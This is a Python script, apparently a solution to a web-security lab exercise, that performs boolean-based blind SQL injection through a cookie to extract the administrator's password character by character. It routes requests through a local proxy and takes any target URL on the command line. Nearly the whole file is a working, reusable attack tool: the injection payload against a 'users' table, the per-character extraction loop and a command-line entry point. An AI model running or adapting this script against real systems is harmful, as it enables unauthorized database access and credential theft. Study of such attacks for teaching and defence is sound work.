"""Boolean-based blind SQL injection extraction script.

Drives a single target URL through a local intercepting proxy and reads back
one password one byte at a time, using the presence of the string "Welcome"
in each response as the yes/no oracle.

Module-level side effects:
    * urllib3's InsecureRequestWarning is silenced (every request below is
      sent with ``verify=False``, i.e. without TLS certificate validation).
    * ``proxies`` hard-codes 127.0.0.1:8080 for both http and https; if
      nothing is listening there, requests raises a ProxyError and main()
      reports it and exits.
"""
import sys
import requests
import urllib3
import urllib.parse
import time
from typing import Optional, Dict

# Hides the warning that accompanies verify=False; it does not make the
# unverified TLS connections any safer, it only keeps the console quiet.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# All traffic is routed through a local proxy (typically an interception tool
# so the requests can be inspected). No fallback to a direct connection.
proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}


def get_initial_cookies(url: str) -> tuple[Dict[str, str], str]:
    """
    Makes an initial request to the URL to retrieve default cookies.

    Sends one GET to ``url`` (no TLS verification, via ``proxies``), converts
    the response's cookie jar to a plain dict, prints every cookie, then
    prompts on stdin until the operator types the name of one of them. The
    HTTP status is not checked: a non-2xx response that still sets cookies is
    accepted.

    Args:
        url: Target URL to request.

    Returns:
        ``(cookies, injection_cookie)``: the cookies as a ``{name: value}``
        dict and the cookie name chosen at the prompt.

    Exits:
        ``sys.exit(1)`` when the response set no cookies at all.
    """
    print("(i) Fetching cookies from the target...")
    response = requests.get(url, verify=False, proxies=proxies)
    cookies = requests.utils.dict_from_cookiejar(response.cookies)
    if not cookies:
        print("[-] No cookies were returned from the server.")
        sys.exit(1)
    print("(i) Cookies retrieved from server:")
    for key, value in cookies.items():
        print(f" {key} = {value}")
    # Loops until the operator names a cookie that actually exists in the
    # dict; any other input just re-prompts.
    while True:
        injection_cookie = input(
            "\n(?) Enter the cookie name to inject SQL payload into: "
        ).strip()
        if injection_cookie in cookies:
            return cookies, injection_cookie
        else:
            print("[-] Cookie not found. Please choose one from the list above.")


def sqli_password(
    url: str,
    cookies: Optional[Dict[str, str]] = None,
    rate_limit: Optional[int] = None,
    password_length: int = 23,
    injection_cookie: Optional[str] = None,
) -> str:
    """
    Recover a password byte by byte through a conditional-response oracle.

    For each position ``1..password_length`` the inner loop sends one GET per
    candidate ASCII code in ``32..125`` (``range`` upper bound is exclusive,
    so 126 is never tried), with the URL-encoded payload appended to the
    current value of ``injection_cookie``. A response containing "Welcome" is
    taken as confirmation of that candidate; the byte is appended and the
    loop moves to the next position. Worst case is ``password_length * 94``
    requests.

    Args:
        url: Target URL.
        cookies: Baseline cookies to send. If this or ``injection_cookie`` is
            ``None``, BOTH are replaced by the result of
            ``get_initial_cookies(url)`` -- a caller-supplied ``cookies`` is
            discarded in that case.
        rate_limit: Requests per second; when truthy, the loop sleeps
            ``1 / rate_limit`` after each unconfirmed candidate. ``0`` and
            ``None`` disable the sleep; a negative value makes
            ``time.sleep`` raise ``ValueError``.
        password_length: Number of positions to probe.
        injection_cookie: Name of the cookie the payload is appended to. A
            name absent from ``cookies`` raises ``KeyError`` on the first
            request.

    Returns:
        The characters confirmed so far. If no candidate in the range matches
        at some position, nothing is appended for it and the loop simply
        continues, so the result can be shorter than ``password_length``.
    """
    password_extracted = ""
    if cookies is None or injection_cookie is None:
        cookies, injection_cookie = get_initial_cookies(url)
    # Narrows Optional for static type checkers only; stripped under `-O`.
    assert cookies is not None  # for static type checkers
    for i in range(1, password_length + 1):
        for j in range(32, 126):
            sqli_payload = (
                "' and (select ascii(substring(password,%s,1)) from users where username='administrator')='%s'--"
                % (i, j)
            )
            sqli_payload_encoded = urllib.parse.quote(sqli_payload)
            # Work on a copy so the baseline cookies are never mutated; the
            # payload is concatenated onto the existing cookie value.
            test_cookies = cookies.copy()
            test_cookies[injection_cookie] += sqli_payload_encoded
            response = requests.get(
                url, cookies=test_cookies, verify=False, proxies=proxies
            )
            if "Welcome" not in response.text:
                # Miss: redraw the progress line with the candidate, no state
                # change.
                sys.stdout.write("\r" + password_extracted + chr(j))
                sys.stdout.flush()
            else:
                # Hit: commit the byte and stop probing this position.
                password_extracted += chr(j)
                sys.stdout.write("\r" + password_extracted)
                sys.stdout.flush()
                break
            # NOTE(review): the original source was collapsed onto one line;
            # this check is assumed to sit inside the inner loop, after the
            # miss/hit branch (a hit breaks out before reaching it).
            if rate_limit:
                time.sleep(1 / rate_limit)
    return password_extracted


def main() -> None:
    """
    Command-line entry point.

    Parses ``url``, ``--cookies``, ``--rate``, ``--length`` and ``--inject``,
    runs ``sqli_password`` and prints the result. Any exception raised inside
    the extraction is reduced to a one-line message and exit status 1; the
    traceback is not shown.
    """
    import argparse
    parser = argparse.ArgumentParser(description="SQL Injection Password Extractor")
    parser.add_argument("url", help="The target URL")
    parser.add_argument(
        "--cookies",
        type=str,
        help="Cookies for the request in key=value format",
        nargs="*",
    )
    parser.add_argument(
        "--rate",
        type=int,
        help="Request rate limit (requests per second)",
        default=None,
    )
    parser.add_argument(
        "--length", type=int, help="Length of the password to extract", default=23
    )
    parser.add_argument(
        "--inject", type=str, help="Cookie name to inject SQL payload into"
    )
    args = parser.parse_args()
    cookies_dict = None
    if args.cookies:
        # Splits on every "=": an entry whose value contains "=" produces more
        # than two parts and dict() raises ValueError. This runs before the
        # try block, so that error surfaces as an uncaught traceback.
        cookies_dict = dict(cookie.split("=") for cookie in args.cookies)
    try:
        print("(+) Retrieving administrator password...")
        password = sqli_password(
            args.url,
            cookies=cookies_dict,
            rate_limit=args.rate,
            password_length=args.length,
            injection_cookie=args.inject,
        )
        print(f"\n(+) Administrator password: {password}")
    except Exception as e:
        # Broad catch: network/proxy failures, a bad --inject name (KeyError)
        # and a negative --rate (ValueError) all end up here indistinguishably.
        print(f"[-] An error occurred: {e}")
        sys.exit(1)


if __name__ == "__main__":
    main()